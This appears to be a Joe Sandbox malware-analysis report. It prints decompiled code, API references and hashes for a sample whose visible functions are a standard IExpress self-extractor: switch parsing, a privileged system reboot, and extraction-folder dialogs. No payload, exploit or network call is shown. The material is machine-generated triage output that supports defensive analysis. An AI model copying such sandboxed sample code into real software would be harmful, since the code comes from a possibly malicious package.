																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xfc8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xfc8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xfc8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xfc8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0xfc8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0xfc9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0xfc9a2c =  *0xfc9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0xfc8d48 =  *0xfc8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0xfc9a2c =  *0xfc9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0xfc9a2c =  *0xfc9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0xfc8d48 =  *0xfc8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0xfc9a2c =  *0xfc9a2c | 0x00000004;
																										L70:
																										 *0xfc8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0xfc9a2c = 3;
																	 *0xfc8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0xfc8a2c != 0 &&  *0xfc8b3e == 0) {
						if(GetModuleFileNameA( *0xfc9a3c, 0xfc8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E00FC66C8(0xfc8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00fc5c9e
0x00fc5ca9
0x00fc5cb0
0x00fc5cb3
0x00fc5cb6
0x00fc5cb7
0x00fc5cb8
0x00fc5cbd
0x00fc6204
0x00fc5ccb
0x00000000
0x00fc5ccb
0x00fc5cd3
0x00fc5cd7
0x00fc5cf4
0x00000000
0x00fc5cf4
0x00fc5cf8
0x00fc5d00
0x00000000
0x00fc5d06
0x00fc5d06
0x00fc5d0e
0x00fc5d10
0x00fc5d12
0x00fc5d14
0x00fc5d15
0x00fc5d17
0x00fc5d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc5d19
0x00fc5d19
0x00fc5d1d
0x00000000
0x00fc5d3f
0x00fc5d3f
0x00fc5d4b
0x00fc5d4b
0x00fc5d4f
0x00fc5d8d
0x00000000
0x00fc5d93
0x00fc5d93
0x00fc5d9a
0x00fc5d9d
0x00fc5d9e
0x00000000
0x00fc5d9e
0x00fc5d51
0x00fc5d5b
0x00fc5d72
0x00fc60fb
0x00fc60fb
0x00fc6207
0x00fc620a
0x00fc620b
0x00fc620e
0x00fc6217
0x00fc5d78
0x00fc5d78
0x00fc5d80
0x00fc5d83
0x00fc5d84
0x00000000
0x00fc5d84
0x00fc5d5d
0x00fc5d5f
0x00fc5d62
0x00fc5d68
0x00fc5d64
0x00fc5d64
0x00fc5d64
0x00000000
0x00fc5d62
0x00fc5d5b
0x00fc5d4f
0x00fc5d1d
0x00000000
0x00fc5d9f
0x00fc5d9f
0x00fc5da5
0x00fc5dab
0x00fc5dba
0x00fc6218
0x00fc621d
0x00fc6220
0x00fc6221
0x00fc6229
0x00fc6230
0x00fc6247
0x00fc626a
0x00fc6272
0x00fc6249
0x00fc6255
0x00fc625f
0x00fc6264
0x00fc6264
0x00fc6284
0x00fc5dc0
0x00fc5dc0
0x00fc5dca
0x00fc5e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc5dcc
0x00fc5dce
0x00fc5e24
0x00fc5e24
0x00fc5e2c
0x00fc5e47
0x00fc5e4a
0x00fc61d2
0x00fc61e2
0x00fc61e7
0x00fc61ee
0x00fc61f1
0x00fc61f1
0x00fc61f8
0x00fc61f8
0x00fc5e50
0x00fc5e53
0x00fc6109
0x00fc611f
0x00000000
0x00fc6125
0x00fc6137
0x00fc613a
0x00fc613c
0x00fc613e
0x00fc613e
0x00fc6141
0x00fc6141
0x00fc6143
0x00fc6144
0x00fc614a
0x00000000
0x00fc6150
0x00fc6152
0x00fc615c
0x00fc6170
0x00fc6172
0x00fc617c
0x00fc6190
0x00fc6190
0x00fc6196
0x00fc61a5
0x00000000
0x00fc61ab
0x00fc61b9
0x00fc61c6
0x00fc61c6
0x00fc617e
0x00fc6180
0x00fc618a
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc618a
0x00fc615e
0x00fc6160
0x00fc616a
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc616a
0x00fc615c
0x00fc614a
0x00fc610b
0x00fc610e
0x00fc610e
0x00000000
0x00fc5e59
0x00fc5e59
0x00fc5e5c
0x00fc604f
0x00fc6056
0x00000000
0x00fc605c
0x00fc606e
0x00fc6071
0x00fc6073
0x00fc6075
0x00fc6075
0x00fc6078
0x00fc6078
0x00fc607a
0x00fc607b
0x00fc6081
0x00000000
0x00fc6087
0x00fc6087
0x00fc608d
0x00fc609c
0x00000000
0x00fc60a2
0x00fc60aa
0x00fc60b2
0x00fc60b7
0x00fc60bd
0x00fc60bf
0x00fc60bf
0x00fc60d6
0x00fc60e0
0x00fc60e7
0x00fc60f5
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc60f5
0x00fc609c
0x00fc6081
0x00fc5e62
0x00fc5e62
0x00fc5e65
0x00fc5fd3
0x00fc5fe9
0x00000000
0x00fc5fef
0x00fc5fef
0x00fc5ff7
0x00fc5ffd
0x00fc6003
0x00fc6006
0x00fc6011
0x00fc6014
0x00fc603d
0x00fc6016
0x00fc6018
0x00fc6019
0x00fc601b
0x00fc6033
0x00fc601d
0x00fc6020
0x00fc6029
0x00fc6022
0x00fc6022
0x00fc6022
0x00fc6020
0x00fc601b
0x00fc6042
0x00fc6044
0x00fc6046
0x00fc604a
0x00fc5ff7
0x00fc5fd5
0x00fc5fd8
0x00fc5fd8
0x00000000
0x00fc5e6b
0x00fc5e6b
0x00fc5e6e
0x00fc5f8b
0x00fc5f99
0x00000000
0x00fc5f9f
0x00fc5fa7
0x00fc5faf
0x00000000
0x00fc5fb1
0x00fc5fb3
0x00000000
0x00fc5fb5
0x00fc5fb7
0x00000000
0x00fc5fb9
0x00000000
0x00fc5fb9
0x00fc5fb7
0x00fc5fb3
0x00fc5faf
0x00fc5f8d
0x00fc5f8d
0x00fc5f8d
0x00fc5f8f
0x00fc5fc1
0x00fc5fc1
0x00fc5fc1
0x00000000
0x00fc5e74
0x00fc5e74
0x00fc5e77
0x00fc5ea0
0x00fc5ebd
0x00fc5f79
0x00000000
0x00fc5f7f
0x00fc5ec3
0x00fc5ec3
0x00fc5ecc
0x00fc5ed4
0x00fc5ed6
0x00fc5edc
0x00fc5edf
0x00fc5eea
0x00fc5eed
0x00fc5f3f
0x00fc5f40
0x00000000
0x00fc5eef
0x00fc5eef
0x00fc5ef2
0x00fc5f34
0x00fc5ef4
0x00fc5ef4
0x00fc5ef7
0x00fc5f2b
0x00000000
0x00fc5ef9
0x00fc5ef9
0x00fc5efc
0x00fc5f22
0x00000000
0x00fc5efe
0x00fc5eff
0x00fc5f02
0x00fc5f16
0x00fc5f04
0x00fc5f07
0x00fc5f0d
0x00fc5f46
0x00fc5f46
0x00fc5f09
0x00fc5f09
0x00fc5f09
0x00fc5f07
0x00fc5f02
0x00fc5efc
0x00fc5ef7
0x00fc5ef2
0x00fc5f4c
0x00fc5f4e
0x00fc5f50
0x00fc5f54
0x00fc5ed4
0x00fc5ea2
0x00fc5ea4
0x00fc5eaf
0x00fc5eaf
0x00000000
0x00fc5e79
0x00fc5e7d
0x00000000
0x00fc5e83
0x00fc5e83
0x00fc5e83
0x00fc5e85
0x00fc5e85
0x00fc5e8e
0x00000000
0x00fc5e94
0x00000000
0x00fc5e94
0x00fc5e8e
0x00fc5e7d
0x00fc5e77
0x00fc5e6e
0x00fc5e65
0x00fc5e5c
0x00000000
0x00000000
0x00000000
0x00fc5dd0
0x00fc5dd0
0x00fc5dd0
0x00000000
0x00fc5dd0
0x00fc5dce
0x00fc5dca
0x00fc5dba
0x00000000
0x00fc5d00
0x00fc5dd9
0x00fc5e04
0x00fc61fe
0x00fc5e0a
0x00fc5e0c
0x00fc5e17
0x00fc5e17
0x00fc5e04
0x00fc6200
0x00fc6200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00FC5CEE
GetModuleFileNameA.KERNEL32(00FC8B3E,00000104,00000000,?,?), ref: 00FC5DFC
CharUpperA.USER32(?), ref: 00FC5E3E
CharUpperA.USER32(-00000052), ref: 00FC5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00FC5F6F
CharUpperA.USER32(?), ref: 00FC5FA7
CharUpperA.USER32(-0000004E), ref: 00FC6008
CharUpperA.USER32(?), ref: 00FC60AA
CloseHandle.KERNEL32(00000000,00FC1140,00000000,00000040,00000000), ref: 00FC61F1
ExitProcess.KERNEL32 ref: 00FC61F8

Strings

RegServer, xrefs: 00FC5F66
:, xrefs: 00FC6118
", xrefs: 00FC5D78
", xrefs: 00FC612D

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 983c54fa9eab8db7d7a3cba9d78091aafec695ac4258cf6784c20021e4ee97cb
Instruction ID: dc4252090fca6969c2c0eaa8b08c88cc58f8d4b83c6b7854683b6d1645668b32
Opcode Fuzzy Hash: 983c54fa9eab8db7d7a3cba9d78091aafec695ac4258cf6784c20021e4ee97cb
Instruction Fuzzy Hash: E5D15831E08A5B5ADB358B388F4BFB93761A716B64F1400ADC486D7151DA74AEC6FB00

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00FC1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0xfc9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0xfc8004; // 0xd6d6fca6
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E00FC44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00FC6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E00FC44B9(0, 0x522, 0xfc1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00FC1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00fc1f90
0x00fc1f90
0x00fc1f93
0x00fc1f98
0x00fc1fa4
0x00fc1fa7
0x00fc1fc5
0x00fc1fcd
0x00fc1fdb
0x00fc1ee5
0x00fc1eea
0x00fc1ef1
0x00fc1ef4
0x00fc1f0c
0x00fc1f2e
0x00fc1f3a
0x00fc1f46
0x00fc1f4d
0x00fc1f58
0x00fc1f60
0x00fc1f61
0x00fc1f62
0x00fc1f75
0x00fc1f80
0x00fc1f77
0x00fc1f77
0x00000000
0x00fc1f77
0x00fc1f64
0x00fc1f64
0x00000000
0x00fc1f64
0x00fc1f0e
0x00fc1f0e
0x00fc1f13
0x00fc1f13
0x00fc1f14
0x00fc1f14
0x00fc1f16
0x00fc1f17
0x00fc1f1a
0x00fc1f1f
0x00fc1f1f
0x00fc1f86
0x00fc1f8f
0x00fc1fcf
0x00fc1fd3
0x00000000
0x00fc1fd3
0x00fc1fa9
0x00fc1fb4
0x00fc1fbb
0x00fc1fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc1fc3
0x00fc1f9a
0x00fc1f9a
0x00fc1fa2
0x00fc1fd9
0x00fc1fda
0x00000000
0x00000000
0x00000000
0x00fc1fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00FC1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00FC1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00FC1FD3

Strings

SeShutdownPrivilege, xrefs: 00FC1F28

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 3319f0febdb1f0f028a65ae8c24970b3bc1f6e5784eea6b0b835a20d6dee3d48
Instruction ID: d00106ebe93f53b7846cf5b9bfbbaf4acd2a028dfe4ff96df8d1228029a3316f
Opcode Fuzzy Hash: 3319f0febdb1f0f028a65ae8c24970b3bc1f6e5784eea6b0b835a20d6dee3d48
Instruction Fuzzy Hash: 6021BC71E4020A6BDB209BA19E4BF7F76BCFB86754F24001DFA02D7182D7759811F661

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC6CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00fc6cf7
0x00fc6d00
0x00fc6d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FC6E26,00FC1000), ref: 00FC6CF7
UnhandledExceptionFilter.KERNEL32(00FC6E26,?,00FC6E26,00FC1000), ref: 00FC6D00
GetCurrentProcess.KERNEL32(C0000409,?,00FC6E26,00FC1000), ref: 00FC6D0B
TerminateProcess.KERNEL32(00000000,?,00FC6E26,00FC1000), ref: 00FC6D12

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: abe571c81e3bae26dfea3f61fbfd66790663c64d0551505e1b88e8c1957d23f2
Instruction ID: d1e5a2c6be7beb8184cf60189f15369674817688c8cf72ea54ac18c94843103b
Opcode Fuzzy Hash: abe571c81e3bae26dfea3f61fbfd66790663c64d0551505e1b88e8c1957d23f2
Instruction Fuzzy Hash: 32D0C93200010CBFDB002BF1EE0EE593F28EB4821AF4D4000F319C3021CA326451AF52

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00FC3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00FC43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xfc9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xfc91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00FC44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xfc91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xfc91e5 - 3;
						if(_t49 - 0xfc91e5 < 3) {
							goto L32;
						}
						_t24 =  *0xfc91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xfc91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00FC658A(0xfc91e4, 0x104, 0xfc1140);
								_t27 = E00FC58C8(0xfc91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xfc91e4 - 0x5c;
									if( *0xfc91e4 != 0x5c) {
										L30:
										_t30 = E00FC597D(0xfc91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xfc91e5 - 0x5c;
									if( *0xfc91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00FC44B9(_t64, 0x54a, 0xfc91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xfc91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xfc91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xfc91e4 - 0x5c;
						if( *0xfc91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xfc9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xfc9a3c, 0x3e8, 0xfc8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00FC4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0xfc87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E00FC44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x00fc321b
0x00fc321e
0x00fc3221
0x00fc343c
0x00fc343e
0x00fc343f
0x00fc3445
0x00fc3447
0x00000000
0x00fc3447
0x00fc3229
0x00fc322a
0x00fc322f
0x00fc33ec
0x00fc33f7
0x00fc3410
0x00fc3416
0x00fc341d
0x00fc342d
0x00fc342d
0x00fc3438
0x00000000
0x00fc3438
0x00fc3237
0x00fc3243
0x00fc3243
0x00fc3246
0x00fc32ee
0x00fc32f4
0x00fc32f6
0x00fc33d4
0x00fc33d6
0x00fc33db
0x00fc33dc
0x00fc33de
0x00fc33df
0x00fc3370
0x00fc3372
0x00000000
0x00fc3372
0x00fc32fc
0x00fc3301
0x00fc3301
0x00fc3303
0x00fc3304
0x00fc3304
0x00fc330a
0x00fc330d
0x00000000
0x00000000
0x00fc3313
0x00fc3318
0x00fc331a
0x00fc3331
0x00fc3332
0x00fc333a
0x00fc333d
0x00fc337c
0x00fc3388
0x00fc338f
0x00fc3394
0x00fc3396
0x00fc33a4
0x00fc33ab
0x00fc33b6
0x00fc33be
0x00fc33c3
0x00fc33c5
0x00fc3435
0x00fc3437
0x00fc3437
0x00000000
0x00fc3437
0x00fc33c7
0x00fc33c9
0x00fc33cc
0x00000000
0x00fc33cc
0x00fc33ad
0x00fc33b4
0x00000000
0x00000000
0x00000000
0x00fc33b4
0x00fc3398
0x00fc3399
0x00fc339b
0x00fc339c
0x00fc339d
0x00000000
0x00fc339d
0x00fc334c
0x00fc3351
0x00fc3354
0x00000000
0x00000000
0x00fc335c
0x00fc3362
0x00fc3364
0x00000000
0x00000000
0x00fc3366
0x00fc3367
0x00fc3369
0x00fc336a
0x00fc336b
0x00000000
0x00fc336b
0x00fc331c
0x00fc3323
0x00000000
0x00000000
0x00fc3329
0x00fc332b
0x00000000
0x00000000
0x00000000
0x00fc332b
0x00fc324c
0x00fc324c
0x00fc324f
0x00fc32c8
0x00fc32ce
0x00000000
0x00fc32ce
0x00fc3251
0x00fc3256
0x00000000
0x00000000
0x00fc3271
0x00fc3277
0x00fc3279
0x00fc3298
0x00fc329d
0x00fc329f
0x00000000
0x00000000
0x00fc32b0
0x00fc32b6
0x00fc32b8
0x00000000
0x00000000
0x00fc32be
0x00fc3280
0x00fc3289
0x00fc328e
0x00000000
0x00fc328e
0x00fc327b
0x00000000
0x00fc327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00FC8598,00000200), ref: 00FC3271
GetDesktopWindow.USER32 ref: 00FC33E2
SetWindowTextA.USER32(?,doza2), ref: 00FC33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00FC3410
GetDlgItem.USER32(?,00000836), ref: 00FC3426
EnableWindow.USER32(00000000), ref: 00FC342D
EndDialog.USER32(?,00000000), ref: 00FC343F

Strings

doza2, xrefs: 00FC33F1
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC32E2, 00FC32E7, 00FC3331, 00FC3344, 00FC335B, 00FC336A

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$doza2
API String ID: 2418873061-4141784238
Opcode ID: 024ed9b4453a375c811c7c883f26b50e09ae952ca71ec3b0d3fe87b4f1679f0b
Instruction ID: 7826bf2a2d80808ca180dd090f33d76432ac845b2d6045d78731bb4d764a3157
Opcode Fuzzy Hash: 024ed9b4453a375c811c7c883f26b50e09ae952ca71ec3b0d3fe87b4f1679f0b
Instruction Fuzzy Hash: 8D512B3074028B7AEB255B355F4FFBB39589B86BE4F14C02CF645971D1CAB8DA01B261

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FC2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0xfc9a3c = __ecx;
				memset(0xfc9140, 0, 0x8fc);
				memset(0xfc8a20, 0, 0x32c);
				memset(0xfc88c0, 0, 0x104);
				 *0xfc93ec = 1;
				_t20 = E00FC468F("TITLE", 0xfc9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0xfc858c = _t27;
					SetEvent(_t27);
					_t64 = 0xfc9a34;
					if(E00FC468F("EXTRACTOPT", 0xfc9a34, 4) != 0) {
						if(( *0xfc9a34 & 0x000000c0) == 0) {
							L12:
							 *0xfc9120 =  *0xfc9120 & _t65;
							if(E00FC5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0xfc8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0xfc8184 != 0) {
										__imp__#17();
									}
									if( *0xfc8a24 == 0) {
										_t57 = _t65;
										if(E00FC36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0xfc9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
